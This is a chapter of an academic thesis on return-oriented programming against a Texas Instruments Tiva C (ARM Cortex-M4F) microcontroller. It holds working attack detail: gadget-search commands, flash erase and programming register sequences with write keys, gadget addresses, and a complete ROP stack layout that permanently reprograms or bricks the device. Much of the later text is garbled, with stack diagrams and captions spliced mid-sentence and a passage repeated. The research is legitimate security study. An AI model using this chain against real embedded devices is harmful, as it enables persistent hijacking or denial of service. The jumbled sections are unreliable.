Francillon and Castelluccia published their research about an ROP procedure on an Atmel AVR atmega 128 8-bit microcontroller [18, 46]. In their paper they were able to successfully demonstrate a buffer overflow and permanent code injection attack using ROP against a sensor node using this microcontroller. In order to do so they performed several buffer overflows to build a fake stack one byte at a time. This fake stack was eventually used to perform the re-write to flash memory.

Our work differs from Francillion’s. We are targeting the Cortex-M4 processor. The Cortex- M4 processor uses the Thumb-2 instruction set, whereas the AVR atmega 128 utilizes the AVR instruction set [19]. We also employ different return strategies which are discussed in Section 2.2. 2.1. Microcontroller Security 19

2.1.3 Thumb Instruction Set

Cortex-M processors utilize the Thumb and Thumb-2 instruction sets. The Thumb-2 in- struction set augments the original Thumb instruction set with several 32-bit instructions. The 16-bit instructions of Thumb map directly to an equivalent 32-bit ARM instruction [10], although not all instructions are accounted for. The advantage is that the instructions take up less space in memory which is desirable for a microcontroller as memory space is typically a premium [88]. For example, on a 16-bit memory system when Thumb is utilized the code size will typically be 65% of what it would have been if the ARM instruction set was used, and it will provide 160% of the performance [10]. The Thumb-2 instruction set adds 32-bit instructions on to the Thumb instruction set in order to allow for operations that were not previously accounted for [11].

This variable size instruction set does not introduce any insurmountable hurdles into the execution of an ROP attack on ARM devices. Some care must be taken to ensure that the processor is in the appropriate execution mode if it is capable of switching between Thumb and ARM instruction sets. Similarly, jumping into a mis-aligned instruction, while theoretically possible, introduces many potential complications and should be avoided.

2.1.4 Threat Model

The threat model for this work is defined here. As previously stated we are attacking the ARM Cortex-M4F processor using the Thumb-2 instruction on a Texas Instruments Tiva TM4C123GH6PM microcontroller.

1. We assume that there exists a vulnerability in the code executing on the microprocessor to allow a buffer overflow to occur. Buffer overflows on the ARM architecture has been 20 Chapter 2. Return Oriented Programming on Embedded Firmware

sufficiently shown elsewhere [30].

2. No execution of code that lies on the stack will be allowed.

3. The attacker has access to the contents of the ROM on the target device in advance of the attack.

2.2 Return-Oriented Programming on ARM Architec-

tures

The Cortex-M4 does not explicitly follow the “write xor execute” memory policy. It is however, a modified Harvard-Architecture so the stack is innately non-executable [5, 46]. The only known way to modify the control flow of a program on such a device is to use ROP techniques. ROP has been proven to be effective at bypassing execution protections on ARM-based devices [29]. Tim Kornau created an extensive work outlining ROP against the ARM architecture [57] in which the author specifically attacks a mobile phone running Windows Mobile 6.x.

There exist several differences between ROP on ARM architecture and x86 architecture [63]. A major difference lies in the structure of the gadget needed; ARM lacks the straightforward return instruction that x86 provides. Routines instead use other specialized instructions to change control flow between different sections of code. This is very important for ROP on a resource-constrained device. Because the code base to search for gadgets is limited the attacker must be creative in their ability to find return-like instructions that will allow them to maintain control of the code execution after each gadget. We identify four control-flow mechanisms used in ARM that can accomplish this purpose which enlarges the set of gadgets available to us. Problem 1 – Discovery of Gadgets

An open source Python program “ROPgadget.py” allows users to extract all candidate ROP gadgets from a binary code segment. The provided ROM.bin file yielded 6236 potential gadgets with the following command:

ROPgadget --binary rom.bin --rawArch=arm --rawMode=thumb --thumb > ropG

This takes into account the ARM architecture and the thumb(2) instruction mode. We were then able to search through this candidate list to find gadgets or chains of gadgets that formed our Turing complete ROP instruction set. The Turing-complete gadget set includes the following necessary functions, explained with stack diagrams.3 Figure 2 shows one example from the actual ROM; all of the gadgets could be similarly found and displayed in the same manner.

2.2. Return-Oriented Programming on ARM Architectures 21

The first of these control flow mechanisms is the push and pop set of instructions. A program utilizes these by storing register values on the stack by means of the push instruction. Then the program will execute the new routine. When that routine is completed, the state of the register is restored by pulling the previously stored value back off the stack by making

use of the pop instruction. In this style of for routine calls, the program counter is one of the registers that is stored on the stack in this style of routine calls, meaning that if a pop instruction is found that contains the program counter register (and ideally no others) it can

be treated in the sameFigure manner2 – Example as of radare2 a return instruction[3] for load immediate in x86 architectures. gadget Figure 2.1 is a load stack diagram which depicts an example of this type of return-like mechanism.

0x00000000 top buffer overflow [r4+4] SP of our choosing 0x01001be6 ldr r0, [r4, 4] r4 pop {r4, PC} PC go after done r0

0xFFFFFFFF bottom Figure 3 – stack diagram (load) Figure 2.1: Example of using a pop pc as a return. This gadgets loads the value from memory location [r4+4]into r0. Note that it assumes that r4 is pre- loaded, but it happens to also pop a value to before returning. Therefore, it can be called twice, the first The second control flow mechanismr4 is a branch instruction that uses another special purpose time putting the desired r4 on the stack. register called the link register. Routines utilizing this style of return simply call another

routine with the specialized bl or blx instruction, which loads the link register with the appropriate return address before branching to the new location. At the end, the called routine loads the link register to the program counter, and execution returns to the original point. 3 All stacks are displayed with top-down methodology This second method has some subtleties that require more attention than the simple pop instruction. First, this style does not allow nested routine calls, as the inner call would overwrite the original value in the link register without being able to restore it. Therefore, 22 Chapter 2. Return Oriented Programming on Embedded Firmware

the link register must be stored onto the stack using a push before the call, and restored after the call with a pop. Secondly, because the link register is used as the return address, it must be loaded with the address of the next gadget before being used as a gadget return.

These sequences can be combined to allow branches to the link register to be used as an

equivalent of return for ROP gadgets. Code which uses a pop to restore the link register from the stack after a call using the bl instruction can be used as a gadget to load the link register with the address of a pop of the program counter. Once this is accomplished, all branches to the link register will jump to the pop of the program counter, which will then pull the next address from the stack as in a traditional ROP attack. If a pop instruction containing both the link register and program counter is found, the link register can be conveniently loaded in a single gadget.

This bears some similarity to the update-load-branch technique described in [30], which searches for gadgets characterized by indirect branches to the address held in a register

which is loaded in a directly preceding instruction. The use of the bx lr instruction allows for a less complicated gadget sequence, where the address of a pop pc instruction is placed in the link register to provide what [30] refers to as a trampoline. This means that our approach does not need to use additional registers to maintain control flow and also does not need to provide an explicit ability to for advancing the stack pointer, two limitations of the work in [30]. Instead the sequence of gadgets using our method is to simply first load the

link register with the address of a pop pc instruction, and then call any number of gadgets ending with a bx lr instruction.

The mechanics of this gadget return style are demonstrated in Figure 2.2, which gives an example of a simple store gadget. First a load immediate gadget puts the address of the

gadget using the bx lr return onto the stack. Next a pop gadget fills the link register with the address of a pop pc instruction (outlined in red). Finally, the unconditional branch 2.2. Return-Oriented Programming on ARM Architectures 23

jumps to the location of the bx lr gadget, which is in this case a simple store instruction. Note that any subsequent gadgets that use the bx lr return do not need to load the link register again, unless it is overwritten as some gadget’s side effect. Any time the bx lr instruction is executed it will immediately jump to the pop pc instruction, which will in turn load the next gadget address from the stack into the program counter.

0x00000000 top Buffer overflow of our choosing esp 0x010083f6 pop {r1, r6, PC} r1 0x010026ea r6

PC 0x01006990 pop.w {r4, LR} r4 bx r1 LR 0x0 002664 1 PC PC after done str r2, [r0] ... bx lr pop {PC} 0xFFFFFFFF bottom

Figure 2.2: Stack Diagram - bx lr Return.

A third control flow mechanism is a direct branch to an address held in a register. This can also be utilized by first loading the register with the address of the next gadget. These branches do not occur as often in code but if found they do provide an opportunity wherever

they are present. An example of this style of return can be seen in Figure 2.2, where the pop instruction responsible for loading the link register is followed by an unconditional branch

to the address held in r1.

The fourth control flow mechanism is a branch with link to a general-purpose register. This 24 Chapter 2. Return Oriented Programming on Embedded Firmware appears as a blx reg where reg may be any general-purpose register such as r1, r2, r3 and so forth. This is very similar to the third control flow mechanism of bx r1. However, the blx instruction not only updates the pc with the address specified by the value stored in the register, it also stores the address of the next instruction after the blx instruction in the lr register [87]. This is the equivalent of a function call and storing the return address in x86, and is used in [30]. An example of this can be seen in Figure 2.3 found in Section 2.4.1.

2.3 Erasing and Programming Flash Memory

This section describes two sets of gadgets for an ROP carried out on the Texas Instru- ments Tiva TM4C123GH6PM containing an ARM Cortex-M4F processor [88] revision 1. The Thumb-2 instruction set is utilized. The Cortex-M4F is designed to be integrated with a ROM which contains peripheral drivers [17]. Addresses 0x01000000-0x1FFFFFFF are re- served for the ROM containing the TivaWare for C Series software. The first set of gadgets is shown to demonstrate that even if the ROM eliminated, this would not make ROP impos- sible. The first attack uses gadgets taken from an example program meant to demonstrate the Sensor Hub BoosterPack, BOOSTXL-SENSHUB [4], an available daughter card for the

Tiva C. The search space gadgets for the first ROP example includes addresses 0x00000000 to 0x00005AA8. The second set of gadgets can be found on the ROM.

Either set of instructions could be used with a buffer overflow to reprogram the flash memory of the microcontroller. This work is not focused on the method of the buffer overflow attack itself. However, it is assumed that a buffer overflow must occur to initiate the ROP procedure. Proof of successful buffer overflow has been sufficiently demonstrated on the ARM architecture [30].

A denial of service attack could be accomplished by simply erasing the region of flash memory 2.3. Erasing and Programming Flash Memory 25

which starts the default program’s execution and then restarting the microcontroller. Once that region of memory is blank the microprocessor would not be able to boot. A second attack could be carried out by reprogramming that portion of flash memory with an arbitrary sequence of instructions after it had been erased. This other exploit is illustrated in both examples.

2.3.1 Finding Gadgets

To find the first set of gadgets, we dissembled the binary of the example program and used that to search for gadgets. For the second, we extracted the ROM binary file from the microcontroller and used its contents to locate gadgets. The open-source Radare2 [9] disassembler program revealed the assembly-code contents of the peripheral drivers included by Texas Instruments on the ROM.

After that, we ran simple grep commands against the resulting files as the starting point in the search for gadgets. However, more sophisticated methods than grep exist to find gadgets. As a result of the ARM instruction set being published and Kornau demonstrating automated searches for gadgets in ARM code, open-source tools exist to assist in the search

for gadgets [7, 57]. ROPgadget.py, an open-source python script, significantly sped up the search for gadgets [79]. Several sources on the ARM architecture also proved to be invaluable in the search for gadgets [2, 34, 99].

ROPgadget.py allows users to extract all candidate ROP gadgets from a binary code segment. The ROM file yielded 6236 potential gadgets. 26 Chapter 2. Return Oriented Programming on Embedded Firmware

2.3.2 Reprogramming Method

In the following attack, the aims of goals of erasing and programming the flash are achieved. The procedures to perform these flash memory operations are found in Section 2.3.2. Gadgets to perform the first exploit are described in Section 2.3.3 and for the second they are described in Section 2.3.4. The character sequence placed on the stack is demonstrated in Section 2.3.3.

Flash Memory Write Sequence

In order to accomplish goals one and two the procedure to erase and write to the flash of the Tiva C must be understood. Programming the flash can only change a bit that is already a

1 to a 0 or just leave the bit as its current value. Programming cannot transition a 0 to a 1. Based on this limitation, it is unlikely for any attack to be successful without first erasing portions of flash.

First flash must be erased and then programmed. This memory is erased by setting all bits to a 1. The flash on the Tiva C can be erased completely or in 1 kB blocks. The attack utilizes a 1 kB erasure. The erase procedure is as follows: first, identify the start address of the 1 kB- aligned (CPU) byte address which specifies which block of flash is the target for the erasure. Next, place that address into the Flash Memory Address (FMA)

register 0x200FD000. Finally, the write key must be loaded into the Flash Memory Control (FMC) register 0x400FD008 to bits 16 to 31 and the erase bit (bit 1) must be set. The write key is determined by the state of the key bit (bit 4) of the Boot Configuration (BOOTCFG)

register 0x400FE1D0. The possible values of the write key are 0x71D5 or 0xA442 for 0 or 1, respectively. In this case the key bit is set to 1 indicating the value of the write key to be 0xA442. Thus the 32-bit value that must be entered into the FMC register erase the 1 kB block is 0xA4420002. The erase sequence can be found in Listing 2.1. In the attack 2.3. Erasing and Programming Flash Memory 27

demonstrated in Section 2.3 the start address of main happens to be located at 0x4BA0 and the minimum block size of flash memory that can be erased is 1 kB. Therefore, the start

address for the erase is 0x00004800. When this procedure is carried out all bits will be set to 1 between 0x00004800 and 0x00004BFF in the flash which includes the start address of main. If the desire was to erase the entire flash instead of just a 1 kB block, simply write the key to the upper 15 bits of the FMC register and set the Mass Erase (MERASE) bit (bit 2). This can be seen in Listing 2.2.

Listing 2.1: Flash erasing sequence for the Tiva C.

1 // address of FMA register

2 uint32_t * FLASH = (uint32_t *) 0x400FD000;

3 FLASH[0x0] = 0x4800; // address to erase

4 // clear the area 0x4800-0x4BFF

5 // perform erase command by writing to

6 // FMC register

7 FLASH[0x2] = 0xA4420002;

Listing 2.2: Mass erasing sequence.

1 // address of FMA register

2 uint32_t * FLASH = (uint32_t *) 0x400FD000;

3 // erase entire flash by writing the key and

4 // setting the MERASE bit of FMC register

5 FLASH[0x2] = 0xA4420004;

Once all bits are erased (set to 1) in the region that is to be re-programed, the flash is prepared to be written. The flash write procedure begins with writing the address to be programed to the same FMA register described in the flash erase procedure. Then the

32-bit word to be written is placed in the Flash Memory Data (FMD) register 0x400F004. Finally, the same write key is written to the upper 16 bits of the FMC register as described 28 Chapter 2. Return Oriented Programming on Embedded Firmware

above, however during a program command, bit 1 the write bit, is set. The programming procedure for writing the exploit program can be seen in Listing 2.3.

An alternate programming procedure includes writing the address to be programed into the FMA as seen earlier. Then the desired words are written to the appropriate Flash Write

Buffer n (FWBn) registers: 0x400FD100 to 0x400FD17C. This technique to write to the flash allows up to 32 32-bit words to be written at once. Then the Flash Write Buffer Valid

(FWBVAL) register 0x400FD030 must be set to a mask indicating which FWBn registers are to be written. In the case of this example, all 32 bits are set. Finally, the Flash Memory Control 2 (FMC2) register is written to. This register is very similar to the FMC register. The write key is entered into the upper 16 bits and bit 1 (the write buffer bit) is set. The

address of the FMC2 register is 0x400fd020. Listing 2.4 illustrates this second method to program the flash. The first programming procedure writes one word at a time and is therefore easier to follow. The second procedure allows for up to 32 words to be written at the same time. As can be seen, Listings 2.3 and Listing 2.4 both write the same words to the same addresses, but Listing 2.4 requires one less instruction because it only needs to write to the FMA register and the FMC register once. This simplification reduces the stack space needed for this exploit which is helpful when attacking a resource constrained device.

Listing 2.3: Tiva C flash programming sequence.

1 // place address to program (main) into FMA

2 FLASH[0x0] = 0x4BA0 ;

3 // assembly add instruction placed in FMD

4 FLASH[0x1] = 0xF1000001 ;

5 // write command - write key and write bit to FMC

6 FLASH[0x2] = 0xA4420001 ;

7 // second address to program placed into FMA

8 FLASH[0x0] = 0x4BA4 ;

9 // assembly branch instruction placed in FMD 2.3. Erasing and Programming Flash Memory 29

10 FLASH[0x1] = 0xE7FC0000 ;

11 // write command - write key and write bit to FMC

12 FLASH[0x2] = 0xA4420001 ;

Listing 2.4: Alternate Tiva C flash programming sequence.

1 // base address to program 0x4B80 is the closest

2 // 32-word alligned address to main at 0x4BA0

3 FLASH[0x0] = 0x4B80 ;

4 // load add instr into FWBn - offset of 0x20

5 FLASH[0x48] = 0xF1000001 ;

6 // load branch instr into FWBn - offset of 0x24

7 FLASH[0x49] = 0xE7FC0000 ;

8 // set every bit in FWBVAL register

9 FLASH[0xC] = 0xFFFFFFFF ;

10 // write key and sett WRBUF bit of FMC2 register

11 FLASH[0x8] = 0xA4420001 ;

2.3.3 Demonstration of Writing a Simple Program to Flash

Here we show a demonstration in which the flash is reprogrammed with a sequence of in- structions that will no longer execute the original program at all, but will instead simply enter into an infinite loop. This loop will begin immediately after the ROP is performed. In addition, it will start again if the system reset push-button is ever pressed or if the Tiva C is

powered off and then back on as this will reside in the flash memory at the location of main. This example will prove that an attacker is able to erase the flash memory and reprogram the microcontroller. 30 Chapter 2. Return Oriented Programming on Embedded Firmware

Gadgets

This example ROP procedure will demonstrate that even a small amount of existing code can be leveraged by a creative attacker. The search space for gadgets for this attack was limited to the example Sensor Hub Booster Pack program.The flash rewrite sequence contained in Listings 2.3 and 2.4 requires two operations: load and store. The search for gadgets resulted in two gadgets, two lines each which can accomplish these tasks. They are shown in Listing 2.5.

Listing 2.5: Gadgets that provide the load and store operations.

1 ; Gadget A at 0x3673

2 str r0, [r4, #0x0]

3 pop {r4, pc}

4 ; Gadget a0 at 0x3675

5 pop {r4, pc}

6 ; Gadget B at 0x42A7

7 mov r0, r4

8 pop {r4, pc}

Gadget A provides the ability to store data from r0 into the address specified at r4. It also causes the program to jump to the next instruction, while filling r4 with more data from the stack. This gadget is effective because r4 is constantly updated, and can thus be used to load immediate values off the stack. Note that Gadget A0 is the second line of Gadget

A and could be useful if the str operation on the first line was not needed. This gadget is only used as the first gadget as there was no need for a store before the a value was popped

into r4 for the first time.

Gadget B transfers the data from r4 into r0. There were no gadgets that would load r0 directly, so this method was a sufficient substitute. The data from the stack is transferred 2.3. Erasing and Programming Flash Memory 31

from the stack to r4 by using Gadget A0, followed by Gadget B where the data is shuttled to r0 while r4 is repopulated. Finally, the data is stored into the desired location via Gadget A.

ROP Procedure

The design of the ROP was taken directly from the code in Listings 2.1 and 2.4. The flash programming method shown in Listing 2.4 was chosen because it needed only 5 total writes to flash registers while the sequence in Listing 2.3 required 6. The gadgets from Listing 2.5 were combined in a pipelined fashion in order to minimize operations. The implementation was still rather bulky at 23 required returns. Table 2.1 describes the order that the gadgets should be executed in order to rewrite the flash memory of the microcontroller.

The ROP attack was first approached by determining the size and boundaries of the stack. Once the boundaries were determined, the location on the stack where the program counter

(pc) was stored was overwritten with the address of Gadget A. Each successive call (shown in Table 2.1) was determined by overwriting the values to be placed into the r4 and pc registers.

This attack was successful and resulted in the flash being permanently reprogrammed. Even after the reset button of the Tiva C was pressed, an infinite loop was entered and nothing else was ever executed. This was verified by stepping through execution on the Tiva C using a debugger.

2.3.4 Second Gadget Set

The second set of gadgets can be seen in Listing 2.6. This gadget set was derived entirely from the ROM. We will not illustrate the second ROP procedure here, as it uses the flash 32 Chapter 2. Return Oriented Programming on Embedded Firmware

Table 2.1: The ROP design.

Gadget Pop into r4 Pop into PC Description 0x30303030 0x30303030 Don’t care 0x30303030 0x30303030 Don’t care 0x00000000 0x00000000 Don’t care 0x00000000 0x00000000 Don’t care 0x00000000 0x00000000 Pop {r4-r5} pop {pc} 0x75360000 Return to A0 A0 0x00480000 0xa7420000 Erase address B 0x00d00f40 0x73360000 Write erase address A 0x020042a4 0xa7420000 Erase command B 0x08d00f40 0x73360000 Write erase command A 0x804b0000 0xa7420000 main address B 0x00d00f40 0x73360000 Write main address A 0x00f10100 0xa7420000 add r0,#0x1 B 0x20d10f40 0x73360000 Write add A 0xfce75555 0xa7420000 b main B 0x24d10f40 0x73360000 Write b A 0xffffffff 0xa7420000 Clear write buffer B 0x30d00f40 0x73360000 Write clear A 0x010042a4 0xa7420000 Flash key B 0x20d00f40 0x73360000 Write flash key A 0x584b0000 0xa7420000 Scatter addr B 0x00d00f40 0x73360000 Write scatter addr A 0x42e00000 0xa7420000 b main B 0x18d10f40 0x73360000 Write b main A 0xffffffff 0xa7420000 Clear write buffer B 0x30d00f40 0x73360000 Write clear A 0x010042a4 0xa7420000 Flash key B 0x20d00f40 0x73360000 Write flash key A 0x00000000 0xa14b0000 Return to main 0x1b 2.3. Erasing and Programming Flash Memory 33

erase and re-write procedures found in Section 2.3.2, and the procedure is very similar to Section 2.3.3. Using the four gadgets in Listing 2.6 we were able to successfully replicate a similar ROP sequence as has been already illustrated. The purpose of this exercise is to demonstrate the ability to find a gadget set in the ROM similar to the gadget set already found in the code of a basic program.

Listing 2.6: Gadgets 1-4, which provide the functionality to erase and reprogram memory.

1 ; Gadget 1 at 0x01007550

2 pop {r0,r1,r3,r6,pc}

3 ; Gadget 2 at 0x010067aa

4 str r0, [r1, #0]

5 pop {r4,pc}

6 ; Gadget 3 at 0x01006990

7 ldmia.w sp!, {r4, lr}

8 bx r1

9 ; Gadget 4 at 0x101001024

10 subs r0, #1

11 bne.n 0x1001024

12 bx lr

The first gadget is a simple command that pops five values off of the stack. The first four

values are stored in registers and the last value is stored in the program counter (pc). This is a very useful gadget because a command that pops the pc off of the stack can be used as a branch command. The address in the pc will be the next command executed by the program.

The second gadget is used to store a value in memory. The value in r0 is stored to the address in r1. This gadget is particularly useful because it stores a 32-bit value to an address without an offset. Many of the possible gadgets in the provided code space will only store bytes or 34 Chapter 2. Return Oriented Programming on Embedded Firmware halfwords and require an offset. More analysis and longer gadgets would be required for these to be used. Another important feature is that it ends with a pop command that includes the Program Counter (pc), so it can be used as a branch to the next gadget.

The textttldmia.w command is used as a load immediate. The registers in the curly brackets are loaded with the values located at the address of first argument. If there is more than one register in the curly bracket the word that is in the next address (following the first argument), is loaded into each following register. In this case, the value at the Stack Pointer

(sp) is loaded into r4, and the next value in the stack is loaded into the Link Register (lr). Then the program branches to the address in r1. This gadget is very useful because it manipulates the link register.

The last gadget is a subtraction command to be used as a delay for the erase and write commands. Whenever a word was written or erased from flash memory a delay of between 50 µs and 300 µs is required. This gadget allowed for a delay long enough for the write or erase command to complete. Register r0 was preloaded with the wait value. If the result of the substitution was 0, a flag would be set and a command can be used as if it were a comparison. In this case, if the result is not equal to zero the program branched to the beginning of the gadget 0x1001024. The program looped through the subs command until a result of 0 at which time the program branches to the lr.

2.4 Turing-complete Gadget Set

The ultimate goal of an attacker in crafting a ROP library of gadgets is to establish a Turing- complete gadget set. This allows the attacker to accomplish an arbitrary computation using a single predefined gadget set, and even to go as far as creating a specialized compiler capable of generating an attack payload directly from C code [54]. 2.4. Turing-complete Gadget Set 35

The successful generation of such a gadget set depends heavily on the size and nature of the code base that is available to the attacker. An ideal environment for the attacker includes standard libraries that the attacker can easily depend on for widespread functionality. How- ever, in embedded systems this is often not the case as memory is at a premium and only specialized libraries are available. For example, a library designed specifically for the pur- pose of configuring device peripherals will likely lack explicit functionality needed to perform complex arithmetic operations. Similarly, a library that provides such mathematical opera- tions may be lacking in load and store instructions needed to work with the device memory. It is also possible that while a particular functionality exists within the library, there are instructions between the desired code and the return instruction which lead to undesirable side effects of the gadget.

The attacker may overcome such limitations with a careful and methodical approach. After building a gadget set containing as many pure gadgets (that is, gadgets that are free from side effects) as could be found, these may then be combined to perform more complex operations. An xor instruction may be used to create gadgets for register clearing, register value swapping, and other operations such as negate. Development of gadgets for saving and restoring states and register values are also very useful, as these allow the use of gadgets with side effects between a save/restore pair of gadgets to avoid the unwanted consequences. By starting with the simplest gadgets and acquiring this functionality as early as possible, more complex functionality can be implemented without finding specific gadgets for each and every operation.

The basic starting gadgets that provide this base to build are easy to identify. Immediate loads of registers are almost trivial: all that is needed is a pop instruction that includes both the program counter and the register in question. Similarly, loads and stores can simply be used directly as long as a gadget return follows close behind. In contrast, a gadget for the 36 Chapter 2. Return Oriented Programming on Embedded Firmware

equivalent of a branch instruction poses significant difficulty. Conditional execution of one

of two gadgets (the equivalent of the if-then-else, or ite instruction) can be accomplished by utilizing the same instruction in the code, which is detailed in the conditional execution gadget below.

A fully-featured conditional branch gadget is much more challenging. To simulate the condi- tional branches of the instruction set the gadget must be capable of executing gadgets ahead in the stack, jumping over others if they are unneeded. The branch must also be capable of returning to an earlier point in the gadget sequence, looping back on itself and allowing gadgets to repeat. This backwards motion is an essential programming paradigm and is necessary for a Turing-complete set of gadgets, as forward and backwards motion must be present in a Turing machine [86].

Executing gadgets that are further ahead in the sequence can be accomplished without

much trouble. A pop instruction removing several values from the stack can be conditionally executed, several times if necessary, to skip the gadgets that should not be executed. A gadget that increments the stack pointer can also be used to more efficiently adjust the next gadget to execute.

Gadgets that decrement the stack pointer are much more difficult to identify. While there is code in the library in question that decrements the stack pointer, it is followed by an increment operation before any return statements such that a gadget cannot be built from it. An attacker would need to identify a way to either decrement the stack pointer to jump to previous gadgets, or copy the previous addresses in the stack to the next portions so that they are executed once again. We introduce a gadget that is capable of this backward looping in this work. 2.4. Turing-complete Gadget Set 37

2.4.1 Requirement

In order to show that our collection of gadgets are Turing-complete we use a paper written by Homescu et al. [52]. Here the authors attempt to create a set of Turing-complete gadgets with each gadget taking up the least amount of bytes possible. The functionality that was needed included twelve gadgets. We capture the same functionality in our gadget set but not in the same way. For example, the authors of [52] included two gadgets whose only functionality was to operate on system flags, while this functionality is built into our gadgets where needed. We were not attempting to identify the smallest possible gadgets, so this method worked for our needs. Besides the flag operations the set of gadgets identified by [52] included functionality to move or exchange register values, pop a value from the stack into a register, control the stack pointer, increment or decrement a value in a register, load a value from an address to a register, store a value to memory, add two values, and subtract

two values. In addition to the above functionality the logical operations of and, or, xor and not are needed. The authors of [52] remind us that because of DeMorgan’s laws only two gadgets are really needed to create the behavior of all these logical operations. The gadgets

needed are either and or or and xor, not or neg. We chose to identify all of these gadgets, although the xor gadget is perhaps impractically large. The final functionality needed to make a gadget set Turing-complete is the ability to compare two values and branch based on their result. This section describes the gadgets we have found which cover all of this functionality.

2.4.2 Gadgets from the Tiva C

The full gadget set developed from the included ROM implements the following functions, explained with stack diagrams. These gadgets illustrate the mechanics of a ROP attack on load immediate

0x00000000 top buffer overflow SP of our choosing 0x00001be8 pop {r4, pc} r4 to be in r0 38 ChapterPC 2. Return0x000083f6 Oriented Programming pop on Embedded{r1, r6, Firmware pc} r1 go after done an embedded ARM devicer6 without any loss of applicability or effectiveness due to the lack r0 PC 0x000069f6 mov r0, r4 of an explicit return instruction. PC blx r1

move: It is critical0xFFFFFFFF to have bottom the ability to move values between registers. As a common Figure 4 – stack diagram (load immediate) operation, there are plenty of gadgets which are suitable for this. The following gadget shown This gadget allows us to load an arbitrary value, preloaded on the stack, into r0. in Figure 2.3 moves the value from register r4 into register r0 then transfers control to the move location popped into r1.

0x00000000 top buffer overflow SP of our choosing 0x010083f6 pop {r1, r6, pc} r1 go after done r6 r4 r0 PC 0x010069f6 mov r0, r4 PC blx r1

0xFFFFFFFF bottom Figure 5 – stack diagram (move) Figure 2.3: Stack Diagram - move. store Note that this gadget has two side effects. First, register r6 is overwritten by the first pop instruction. The0x00000000 register maytop be filledbuffer with overflow either a “don’t care” value or a value used by a SP of our choosing future gadget. However, if the value0x00007d50 in r6 must be preservedpop then it{r0, should r1, be savedr3, beforer6, PC} r0 value this gadget and restored afterwards. r1 location The second side effectr3 is the overwriting of the address in the link register that is used as a r6 return address in the link register style of returns. Therefore, if any gadgets using this style PC 0x00002662 str R0, [R3, 0xC] of return follow thisPC gadget then thego after done link register must bepop reloaded {PC} with the appropriate address. [r3+0xC]

0xFFFFFFFF bottom These two side effects demonstrate that for any gadget the potential impacts must be un- Figure 6 – stack diagram (store) derstood and accounted for. The attacker can compensate for them with planning, but We are actually using only registers r0 and r3, and we don’t care about r1 and r6, so we simply put something obviouslyarbitrary on gadgets the stack without in those these positions caveats when are preferred. we overflow Similar the sidebuffer. effects The will result occur is that with we are able Problem 1 – Discovery of Gadgets

An open source Python program “ROPgadget.py” allows users to extract all candidate ROP gadgets from a binary code segment. The provided ROM.bin file yielded 6236 potential gadgets with the following command:

ROPgadget --binary rom.bin --rawArch=arm --rawMode=thumb --thumb > ropG

This takes into account the ARM architecture and the thumb(2) instruction mode. We were then able to search through this candidate list to find gadgets or chains of gadgets that formed our Turing complete ROP instruction set. The Turing-complete gadget set includes the following necessary functions, explained with stack diagrams.3 Figure 2 shows one example from the actual ROM; all of the gadgets could be similarly found and displayed in the same manner.

2.4. Turing-complete Gadget Set 39

many of the gadgets presented here due to the small size and specialized nature of the code base in question.

load: The load gadget loads the value from memory location r4+4 into r0. Note that it assumes that r4 is pre-loaded, but it happens to also pop a value to r4 before returning.

Therefore, if necessary,Figure it2 – couldExample be of radare2 called twice,[3] for the load immediate first time putting gadget the desired r4 address load on the stack. The load gadget is illustrated in Figure 2.4.

0x00000000 top buffer overflow [r4+4] SP of our choosing 0x01001be6 ldr r0, [r4, 4] r4 pop {r4, PC} PC go after done r0

0xFFFFFFFF bottom Figure 3 – stack diagram (load) Figure 2.4: Stack Diagram - load. This gadgets loads the value from memory location [r4+4]into r0. Note that it assumes that r4 is pre- loaded, but it happens to also pop a value to before returning. Therefore, it can be called twice, the first load immediate: The load immediater4 gadget shown in Figure 2.5 will take an arbitrary time putting the desired r4 on the stack. value and load it into a given register. In this case, the attacker can place the arbitrary value

on the stack and pop it into r4.

store: The store gadget will store the value in register r0 to a memory location at an offset of 12 from the address the attacker places in r3. Figure 2.6 shows a stack diagram of the 3 All stacks are displayed with top-down methodologystore gadget.

The operations below can be carried out strictly by register operations, e.g., AND, or through register operations with an immediate operand, e.g., AND immediate. Above we showed that immediate values can be loaded into registers, so the operations below focus strictly on register operations assuming a value has been pre-loaded into a register, if necessary.

add: The add gadget sums the values in r1 and r3, then stores that sum in r1. This load immediate

0x00000000 top buffer overflow of our choosing SP 0x00001be8 pop {r4, pc} 40 r4 Chapter 2. Returnto be in Orientedr0 Programming on Embedded Firmware PC 0x000083f6 pop {r1, r6, pc} r1 go after done load immediate r6 r0 PC 0x000069f6 mov r0, r4

PC0x00000000 top Buffer overflow blx r1 of our choosing 0xFFFFFFFF%esp bottom Figure 4 – stack diagram0x01001be8 (load immediate) pop {r4, pc} r4 to be in r0 This gadget allows us to load an arbitrary value, preloaded on the stack, into r0. PC 0x010083f6 pop {r1, r6, pc} move r1 go after done r6 0x00000000 top buffer overflow r0 PC 0x0of our1 choosing0069f6 mov r0, r4 SP PC 0x000083f6 popblx {r1, r1 r6, pc} r1 go after done

0xFFFFFFFFr6 bottom

r4 r0 PC Figure 3 – 0x0000stack diagram69f6 (load immediate) mov r0, r4 PC Figure 2.5: Stack Diagram - load immediateblx r1. This gadget allows us to load an arbitrary value, preloaded on the stack, into 0xFFFFFFFF bottom r0. Figure 5 – stack diagram (move) move store 0x00000000 top Buffer overflow of our choosing 0x00000000%esp top buffer overflow of our0x000083f6 choosing pop {r1, r6, pc} SP r1 0x00007dgo after done50 pop {r0, r1, r3, r6, PC} r0 r6 value r4 r0 r1 PC 0x000069f6 mov r0, r4 location PC r3 blx r1 r6 0xFFFFFFFF bottom PC 0x00002662 str R0, [R3, 0xC] Figure 4 – stack diagram (move) PC go after done pop {PC} [r3+0xC] load 0xFFFFFFFF bottom Figure 6 – stack diagram (store) 0x00000000 Figuretop 2.6:Buffer Stack overflow Diagram - store. We are actually[r4+4] using only registers%esp r0 and r3, and weof our don’t choosing care about r1 and r6, so we simply put something arbitrary on the stack in those positions when0x00001be6 we overflow the buffer.ldr The resultr0, is[r4, that we 4] are able r4 pop {r4, PC} PC go after done r0

0xFFFFFFFF bottom Figure 5 – stack diagram (load) to store whatever value we place in r0 from the stack into a memory location of our choosing by addressing with r3 minus 12. Thus, we are able to store an arbitrary value to an arbitrary location.

*(r3+12) <- R0 In this case:

r0 = 0x7d5 = 2005 2.4. Turing-complete Gadget Set 41 Stored in memory location R3+0xC gadget complicates matters by ending in a bx lr command, which is the most common way = 0xBABEFAC2 + 12 = 0xBABEFACE to return from a legitimate subroutine. The issue is that control will be passed back to the [0xBABEFACE] = 2005 address contained in the link register (lr), so we must proactively use the first two jumps add / add immediateto set lr to a value we control from the stack.

